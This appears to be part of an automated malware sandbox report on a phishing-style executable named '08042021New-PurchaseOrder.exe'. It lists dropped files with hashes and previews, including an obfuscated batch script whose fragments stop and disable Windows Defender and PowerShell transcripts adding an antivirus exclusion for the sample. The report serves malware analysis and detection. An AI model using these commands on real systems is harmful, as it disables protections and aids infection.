                                                                                    SHA1:8A2B76B9D5F123ABE2F1F275AFAD29E5F5D2A9C4
                                                                                    SHA-256:D658934AD7CC52739BA1A2808A53EDEAA5F3C227C8192FF9597F848AF26B8871
                                                                                    SHA-512:A63A63DA0AF86F295BE0D58ADE3738C956FDE8B3EEE41A5DE76E9AFEA1C9034F42982D1660EA6FB080AE682008D1FE666DFA4B73E61552A9110B1A50353C628B
                                                                                    Malicious:false
                                                                                    Preview: @...e.......................S.F.&.......=............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                    C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: RFQ-034.exe, Detection: malicious, Browse
                                                                                    • Filename: Payment Slip.exe, Detection: malicious, Browse
                                                                                    • Filename: Revised Invoice No CU 7035.exe, Detection: malicious, Browse
                                                                                    • Filename: Sales_Order description.exe, Detection: malicious, Browse
                                                                                    • Filename: Outstanding invoices.exe, Detection: malicious, Browse
                                                                                    • Filename: Q88_Bulk Carrier.exe, Detection: malicious, Browse
                                                                                    • Filename: Payment _Slip copy.exe, Detection: malicious, Browse
                                                                                    • Filename: MV. HUA KAI V-2023.exe, Detection: malicious, Browse
                                                                                    • Filename: Order_April shipment.exe, Detection: malicious, Browse
                                                                                    • Filename: INVOICE for Order PIEX310113978.exe, Detection: malicious, Browse
                                                                                    • Filename: Krishna Gangaa Enviro System Pvt Ltd.exe, Detection: malicious, Browse
                                                                                    • Filename: TT SWIFT COPY.exe, Detection: malicious, Browse
                                                                                    • Filename: PO75773937475895377.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe, Detection: malicious, Browse
                                                                                    • Filename: Download Report.06.05.2021.exe, Detection: malicious, Browse
                                                                                    • Filename: Outstanding invoices.exe, Detection: malicious, Browse
                                                                                    • Filename: IMG_767893434432.exe, Detection: malicious, Browse
                                                                                    • Filename: VMtEguRH.exe, Detection: malicious, Browse
                                                                                    • Filename: SHIPPING DOCS - MV. SN QUEEN.exe, Detection: malicious, Browse
                                                                                    • Filename: MT CAPE AZALEA V219 PENAVICO 13-10-20.exe, Detection: malicious, Browse
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_autfnfbp.5ke.psm1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dva0twzw.csn.ps1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu12tuhx.b3d.ps1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5lfjoqp.nj0.psm1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                    C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                    C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32008
                                                                                    Entropy (8bit):6.50608873264544
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:/FmaU0mnYm/8KfVJlIAHcQxGflnBieit0JLkbPd2HdPIZy75V3qKncMrGDDkhx6Z:/FmaU0mnYm/XfFHcQiv2
                                                                                    MD5:27233176A2A979195B01A53EC16C7631
                                                                                    SHA1:0EF424D2000F18E6B83473535BF85D22ED9AB79B
                                                                                    SHA-256:397A62FC978F7A97A87CAAF9C35E98E4A053DE4E786BEEE73A6C1AC0E99C9FC9
                                                                                    SHA-512:F8A620CA97069FA352621BB76C1C83BDEBB7692F0B80DE2E9D273EBB718D4D4BA412F2B057580023BD646DA09647D82E035F6C2AD28E59200B7433FD1AB2D0E7
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 15%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..^..........~}... ........@.. ..............................S.....@.................................(}..S....................h............................................................... ............... ..H............text....]... ...^.................. ..`.rsrc................`..............@..@.reloc...............f..............@..B................`}......H........5...H...........................................................*".(.....*Vs....(....t.........*".(.....*R.(.......s....}....*6.(....o,....*....0...........~.....+..*..0..9........r...p..((....rE..p.(......(......,...(.....+..~.....+..*....0..#........r...p..((....rE..p.(.......(.....*..0..9........s.....+........o....o.....o....,...o........o....o.....*....0...........(....o.....+.+........*.0.. ........rI..p.+..........s......%r_..p .........%.r...p.%.r...p.%.r...p
                                                                                    C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe:Zone.Identifier
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.445817.dfbKEN5N.20210408122415.txt
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5845
                                                                                    Entropy (8bit):5.399277409284378
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:BZVhtNxqDo1ZeZFhtNxqDo1ZtMGkjZWhtNxqDo1ZQ100DZU:u
                                                                                    MD5:B240F22E63DF44CA4B62678B85131460
                                                                                    SHA1:C119F7AAAB0B4B6446C09C72634F7944540742E4
                                                                                    SHA-256:94293DB0624CC339E38D1231CA91500CAC8F27911A4409441F69EE1B2077782B
                                                                                    SHA-512:E66C91C83D3AA181E1914D0759B936E4EAA38E2B97677564963D071CE13C97B94FB5CA2CAAD5AFE56CD0E715F88A8B0A71A888B8425D42506B6D68588F7E395B
                                                                                    Malicious:false
                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408122441..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..Process ID: 3636..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408122441..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210408122931..Username: computer\user..RunA
                                                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.445817.ku7owyer.20210408122414.txt
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5845
                                                                                    Entropy (8bit):5.400354439564955
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:BZYhtNcqDo1Z5ZchtNcqDo1ZqMGkjZmhtNcqDo1Zj100/Z8:Y
                                                                                    MD5:360118D3E5E153530C9CF66B5A41EFFB
                                                                                    SHA1:93A5D02A88AC85B0C6A71B509455F0D9A1605A47
                                                                                    SHA-256:A52C0F3D078CB67B58D27BC1A139A66965557978522977DE39EF408F7B060DEE
                                                                                    SHA-512:060F0692A71A5BF4CB43A2952A168D96D0EA2B6249DBB650FCBCB72B26D2F755DE2CA20FDAA34AEEC13D782C3F5F8731844FB8C184B3D368CD568D60B03C5902
                                                                                    Malicious:false
                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408122439..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..Process ID: 5828..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408122439..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210408122729..Username: computer\user..RunA
                                                                                    C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUoj
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5128155
                                                                                    Entropy (8bit):3.033446165324156
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:yKhvmsqbzKhvmsqbpedqCzKhvmsqbpedqCt:U
                                                                                    MD5:14F9C1984DB22EF66B73F7818CCD792A
                                                                                    SHA1:DD973A3668A9B7C5D505EF132D191B42BCDF8879
                                                                                    SHA-256:37DB6E90DF6101E3FD7D1DC2A0FC476EE0EB3AD7FD50AFFD8A89E447668758F2
                                                                                    SHA-512:B95110CBAC27CDCCCB1A8A320AB04EF8341BA79CAEA28DC4FA3647C53AE35A645225C97D3384D3750B7DB8E6E46E9DF9887A34CDFACF317B64CAE07B3D511E47
                                                                                    Malicious:false
                                                                                    Preview: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 76 142 41 180 0 0 0 0 0 0 0 0 224 0 34 0 11 1 80 0 0 102 10 0 0 6 0 0 0 0 0 0 94 133 10 0 0 32 0 0 0 160 10 0 0 0 0 128 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 224 10 0 0 2 0 0 0 0 0 0 2 0 64 133 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 4 133 10 0 87 0 0 0 0 160 10 0 212 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 192 10 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 8 0 0 0 0 0 0 0 0 0 0 0 8 32 0 0 72 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 100 101 10 0 0 32 0 0 0 102 10 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 9

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):6.50608873264544
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:08042021New-PurchaseOrder.exe
                                                                                    File size:32008
                                                                                    MD5:27233176a2a979195b01a53ec16c7631
                                                                                    SHA1:0ef424d2000f18e6b83473535bf85d22ed9ab79b
                                                                                    SHA256:397a62fc978f7a97a87caaf9c35e98e4a053de4e786beee73a6c1ac0e99c9fc9
                                                                                    SHA512:f8a620ca97069fa352621bb76c1c83bdebb7692f0b80de2e9d273ebb718d4d4ba412f2b057580023bd646da09647d82e035f6c2ad28e59200b7433fd1ab2d0e7
